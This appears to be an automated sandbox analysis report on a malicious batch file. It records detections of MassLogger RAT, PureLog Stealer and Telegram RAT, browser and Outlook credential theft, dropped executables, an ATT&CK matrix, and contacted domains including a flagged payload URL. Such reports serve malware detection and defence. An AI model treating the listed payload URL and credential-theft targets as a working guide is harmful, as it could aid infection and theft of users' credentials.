Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3277651726.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640f08.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b4e5e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ebd3d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de54e5e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ebd3d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de53f56.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb95570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f0a3d90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d813f56.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f065570.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb96478.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a86478.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ffd0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de53f56.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b3f56.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb96478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f066478.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d813f56.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00f08.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.28640000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26ac3d90.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f0a3d90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d814e5e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b3f56.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0f08.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.27f00000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30c70000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30c70000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2de54e5e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.rpkhzpuO.pif.23be07b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a85570.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1eb95570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f065570.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.257b4e5e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1d814e5e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.30640f08.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.200d0f08.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rpkhzpuO.pif.1ffd0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rpkhzpuO.pif.2f066478.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a86478.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26a85570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	12 Native API	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Valid Accounts	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	3 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	1 Email Collection	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	1 Query Registry	SSH	1 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	341 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	41 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO#5_Tower_049.bat	45%	ReversingLabs	Win32.Trojan.ModiLoader

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	100%	Avira	TR/Dropper.Gen
C:\Users\Public\Libraries\Oupzhkpr.PIF	100%	Avira	HEUR/AGEN.1326043
C:\Users\user\AppData\Local\Temp\x.exe	100%	Avira	HEUR/AGEN.1326043
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Microsofts.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Microsofts.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Oupzhkpr.PIF	83%	ReversingLabs	Win32.Trojan.ModiLoader
C:\Users\Public\Libraries\rpkhzpuO.pif	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Microsofts.exe	91%	ReversingLabs	ByteCode-MSIL.Spyware.Snakekeylogger
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	79%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\x.exe	83%	ReversingLabs	Win32.Trojan.ModiLoader

Source	Detection	Scanner	Label
https://lwaziacademy.com:443/wps/200_OupzhkprnvwB	0%	Avira URL Cloud	safe
https://lwaziacademy.com/wps/200	0%	Avira URL Cloud	safe
https://lwaziacademy.com/wps/200_Oupzhkprnvw	100%	Avira URL Cloud	malware
http://team-x.ru/	0%	Avira URL Cloud	safe
https://lwaziacademy.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
lwaziacademy.com	41.185.8.252	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high
171.39.242.20.in-addr.arpa	unknown	unknown	false	high
212.20.149.52.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
https://lwaziacademy.com/wps/200_Oupzhkprnvw	true	Avira URL Cloud: malware	unknown
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://team-x.ru/	x.exe, 00000004.00000003.2058015103.00000000218ED000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2016123809.000000007F370000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.2012623457.0000000000401000.00000020.00000001.01000000.00000004.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000000C40000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, PO#5_Tower_049.bat, Oupzhkpr.PIF.4.dr, x.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	Microsofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.1d	Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
https://lwaziacademy.com:443/wps/200_OupzhkprnvwB	x.exe, 00000004.00000002.2065211434.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 0000000A.00000002.2166666911.0000000003397000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lwaziacademy.com/wps/200	x.exe, 00000004.00000002.2084775206.000000002070D000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189l	Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
